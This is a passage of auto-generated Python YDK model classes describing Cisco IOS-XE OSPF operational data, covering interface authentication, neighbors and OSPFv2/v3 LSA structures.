('sa', (YLeaf(YType.str, 'sa'), ['str'])),
('key_chain', (YLeaf(YType.str, 'key-chain'), ['str'])),
('key_string', (YLeaf(YType.str, 'key-string'), ['str'])),
('no_auth', (YLeaf(YType.uint32, 'no-auth'), ['int'])),
])
self.sa = None
self.key_chain = None
self.key_string = None
self.no_auth = None
self.crypto_algorithm_val = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal()
self.crypto_algorithm_val.parent = self
self._children_name_map["crypto_algorithm_val"] = "crypto-algorithm-val"
self._segment_path = lambda: "authentication"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication, ['sa', 'key_chain', 'key_string', 'no_auth'], name, value)
class CryptoAlgorithmVal(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal, self).__init__()
self.yang_name = "crypto-algorithm-val"
self.yang_parent_name = "authentication"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('hmac_sha1_12', (YLeaf(YType.empty, 'hmac-sha1-12'), ['Empty'])),
('hmac_sha1_20', (YLeaf(YType.empty, 'hmac-sha1-20'), ['Empty'])),
('md5', (YLeaf(YType.empty, 'md5'), ['Empty'])),
('sha_1', (YLeaf(YType.empty, 'sha-1'), ['Empty'])),
('hmac_sha_1', (YLeaf(YType.empty, 'hmac-sha-1'), ['Empty'])),
('hmac_sha_256', (YLeaf(YType.empty, 'hmac-sha-256'), ['Empty'])),
('hmac_sha_384', (YLeaf(YType.empty, 'hmac-sha-384'), ['Empty'])),
('hmac_sha_512', (YLeaf(YType.empty, 'hmac-sha-512'), ['Empty'])),
])
self.hmac_sha1_12 = None
self.hmac_sha1_20 = None
self.md5 = None
self.sha_1 = None
self.hmac_sha_1 = None
self.hmac_sha_256 = None
self.hmac_sha_384 = None
self.hmac_sha_512 = None
self._segment_path = lambda: "crypto-algorithm-val"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal, ['hmac_sha1_12', 'hmac_sha1_20', 'md5', 'sha_1', 'hmac_sha_1', 'hmac_sha_256', 'hmac_sha_384', 'hmac_sha_512'], name, value)
class OspfNeighbor(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor, self).__init__()
self.yang_name = "ospf-neighbor"
self.yang_parent_name = "ospf-interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['neighbor_id']
self._child_classes = OrderedDict([("stats", ("stats", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats))])
self._leafs = OrderedDict([
('neighbor_id', (YLeaf(YType.str, 'neighbor-id'), ['str','str'])),
('address', (YLeaf(YType.str, 'address'), ['str','str'])),
('dr', (YLeaf(YType.str, 'dr'), ['str','str'])),
('bdr', (YLeaf(YType.str, 'bdr'), ['str','str'])),
('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'NbrStateType', '')])),
])
self.neighbor_id = None
self.address = None
self.dr = None
self.bdr = None
self.state = None
self.stats = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats()
self.stats.parent = self
self._children_name_map["stats"] = "stats"
self._segment_path = lambda: "ospf-neighbor" + "[neighbor-id='" + str(self.neighbor_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor, ['neighbor_id', 'address', 'dr', 'bdr', 'state'], name, value)
class Stats(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats, self).__init__()
self.yang_name = "stats"
self.yang_parent_name = "ospf-neighbor"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('nbr_event_count', (YLeaf(YType.uint32, 'nbr-event-count'), ['int'])),
('nbr_retrans_qlen', (YLeaf(YType.uint32, 'nbr-retrans-qlen'), ['int'])),
])
self.nbr_event_count = None
self.nbr_retrans_qlen = None
self._segment_path = lambda: "stats"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats, ['nbr_event_count', 'nbr_retrans_qlen'], name, value)
class IntfLinkScopeLsas(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas, self).__init__()
self.yang_name = "intf-link-scope-lsas"
self.yang_parent_name = "ospf-interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['lsa_type']
self._child_classes = OrderedDict([("link-scope-lsa", ("link_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa)), ("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa))])
self._leafs = OrderedDict([
('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
])
self.lsa_type = None
self.link_scope_lsa = YList(self)
self.area_scope_lsa = YList(self)
self._segment_path = lambda: "intf-link-scope-lsas" + "[lsa-type='" + str(self.lsa_type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas, ['lsa_type'], name, value)
class LinkScopeLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa, self).__init__()
self.yang_name = "link-scope-lsa"
self.yang_parent_name = "intf-link-scope-lsas"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['lsa_id','adv_router']
self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External)), ("ospfv2-unknown-tlv", ("ospfv2_unknown_tlv", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv)), ("ospfv3-lsa-val", ("ospfv3_lsa_val", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link)), ("ospfv3-prefix-list", ("ospfv3_prefix_list", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix)), ("multi-topology", ("multi_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology)), ("tlv", ("tlv", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv)), ("unknown-sub-tlv", ("unknown_sub_tlv", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv))])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])),
('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])),
('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])),
('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])),
('version', (YLeaf(YType.uint32, 'version'), ['int'])),
('router_address', (YLeaf(YType.str, 'router-address'), ['str','str'])),
])
self.lsa_id = None
self.adv_router = None
self.decoded_completed = None
self.raw_data = []
self.version = None
self.router_address = None
self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa()
self.ospfv2_lsa.parent = self
self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa"
self.ospfv3_lsa_val = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal()
self.ospfv3_lsa_val.parent = self
self._children_name_map["ospfv3_lsa_val"] = "ospfv3-lsa-val"
self.tlv = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv()
self.tlv.parent = self
self._children_name_map["tlv"] = "tlv"
self.ospfv2_link = YList(self)
self.ospfv2_topology = YList(self)
self.ospfv2_external = YList(self)
self.ospfv2_unknown_tlv = YList(self)
self.ospfv3_link = YList(self)
self.ospfv3_prefix_list = YList(self)
self.ospfv3_ia_prefix = YList(self)
self.multi_topology = YList(self)
self.unknown_sub_tlv = YList(self)
self._segment_path = lambda: "link-scope-lsa" + "[lsa-id='" + str(self.lsa_id) + "']" + "[adv-router='" + str(self.adv_router) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa, ['lsa_id', 'adv_router', 'decoded_completed', 'raw_data', 'version', 'router_address'], name, value)
class Ospfv2Lsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, self).__init__()
self.yang_name = "ospfv2-lsa"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody))])
self._leafs = OrderedDict()
self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header()
self.header.parent = self
self._children_name_map["header"] = "header"
self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody()
self.lsa_body.parent = self
self._children_name_map["lsa_body"] = "lsa-body"
self._segment_path = lambda: "ospfv2-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, [], name, value)
class Header(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, self).__init__()
self.yang_name = "header"
self.yang_parent_name = "ospfv2-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])),
('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])),
('age', (YLeaf(YType.uint16, 'age'), ['int'])),
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])),
])
self.lsa_id = None
self.opaque_type = None
self.opaque_id = None
self.age = None
self.type = None
self.adv_router = None
self.seq_num = None
self.checksum = None
self.length = None
self.flag_options = Bits()
self._segment_path = lambda: "header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value)
class LsaBody(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, self).__init__()
self.yang_name = "lsa-body"
self.yang_parent_name = "ospfv2-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network))])
self._leafs = OrderedDict([
('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])),
('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])),
('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])),
('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])),
])
self.num_of_links = None
self.summary_mask = None
self.external_mask = None
self.body_flag_options = Bits()
self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network()
self.network.parent = self
self._children_name_map["network"] = "network"
self._segment_path = lambda: "lsa-body"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value)
class Network(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__()
self.yang_name = "network"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])),
('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
])
self.network_mask = None
self.attached_router = []
self._segment_path = lambda: "network"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value)
class Ospfv2Link(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link, self).__init__()
self.yang_name = "ospfv2-link"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['link_id','link_data']
self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology))])
self._leafs = OrderedDict([
('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
('type', (YLeaf(YType.uint8, 'type'), ['int'])),
])
self.link_id = None
self.link_data = None
self.type = None
self.ospfv2_topology = YList(self)
self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value)
class Ospfv2Topology(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__()
self.yang_name = "ospfv2-topology"
self.yang_parent_name = "ospfv2-link"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.mt_id = None
self.metric = None
self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2Topology(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology, self).__init__()
self.yang_name = "ospfv2-topology"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.mt_id = None
self.metric = None
self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2External(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External, self).__init__()
self.yang_name = "ospfv2-external"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
])
self.mt_id = None
self.metric = None
self.forwarding_address = None
self.external_route_tag = None
self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value)
class Ospfv2UnknownTlv(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, self).__init__()
self.yang_name = "ospfv2-unknown-tlv"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['type']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
('value', (YLeafList(YType.uint8, 'value'), ['int'])),
])
self.type = None
self.length = None
self.value = []
self._segment_path = lambda: "ospfv2-unknown-tlv" + "[type='" + str(self.type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, ['type', 'length', 'value'], name, value)
class Ospfv3LsaVal(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, self).__init__()
self.yang_name = "ospfv3-lsa-val"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody))])
self._leafs = OrderedDict()
self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header()
self.header.parent = self
self._children_name_map["header"] = "header"
self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody()
self.lsa_body.parent = self
self._children_name_map["lsa_body"] = "lsa-body"
self._segment_path = lambda: "ospfv3-lsa-val"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, [], name, value)
class Header(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, self).__init__()
self.yang_name = "header"
self.yang_parent_name = "ospfv3-lsa-val"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader))])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])),
])
self.lsa_id = None
self.lsa_hdr_options = Bits()
self.lsa_header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader()
self.lsa_header.parent = self
self._children_name_map["lsa_header"] = "lsa-header"
self._segment_path = lambda: "header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, ['lsa_id', 'lsa_hdr_options'], name, value)
class LsaHeader(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, self).__init__()
self.yang_name = "lsa-header"
self.yang_parent_name = "header"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('age', (YLeaf(YType.uint16, 'age'), ['int'])),
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
])
self.age = None
self.type = None
self.adv_router = None
self.seq_num = None
self.checksum = None
self.length = None
self._segment_path = lambda: "lsa-header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value)
class LsaBody(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, self).__init__()
self.yang_name = "lsa-body"
self.yang_parent_name = "ospfv3-lsa-val"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix))])
self._leafs = OrderedDict([
('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])),
('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])),
])
self.lsa_flag_options = Bits()
self.lsa_body_flags = Bits()
self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network()
self.network.parent = self
self._children_name_map["network"] = "network"
self.prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"
self.ia_router = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter()
self.ia_router.parent = self
self._children_name_map["ia_router"] = "ia-router"
self.lsa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal()
self.lsa_external.parent = self
self._children_name_map["lsa_external"] = "lsa-external"
self.nssa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa()
self.nssa.parent = self
self._children_name_map["nssa"] = "nssa"
self.link_data = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData()
self.link_data.parent = self
self._children_name_map["link_data"] = "link-data"
self.ia_prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix()
self.ia_prefix.parent = self
self._children_name_map["ia_prefix"] = "ia-prefix"
self._segment_path = lambda: "lsa-body"
self._is_frozen = True
def __setattr__(self, name, value):
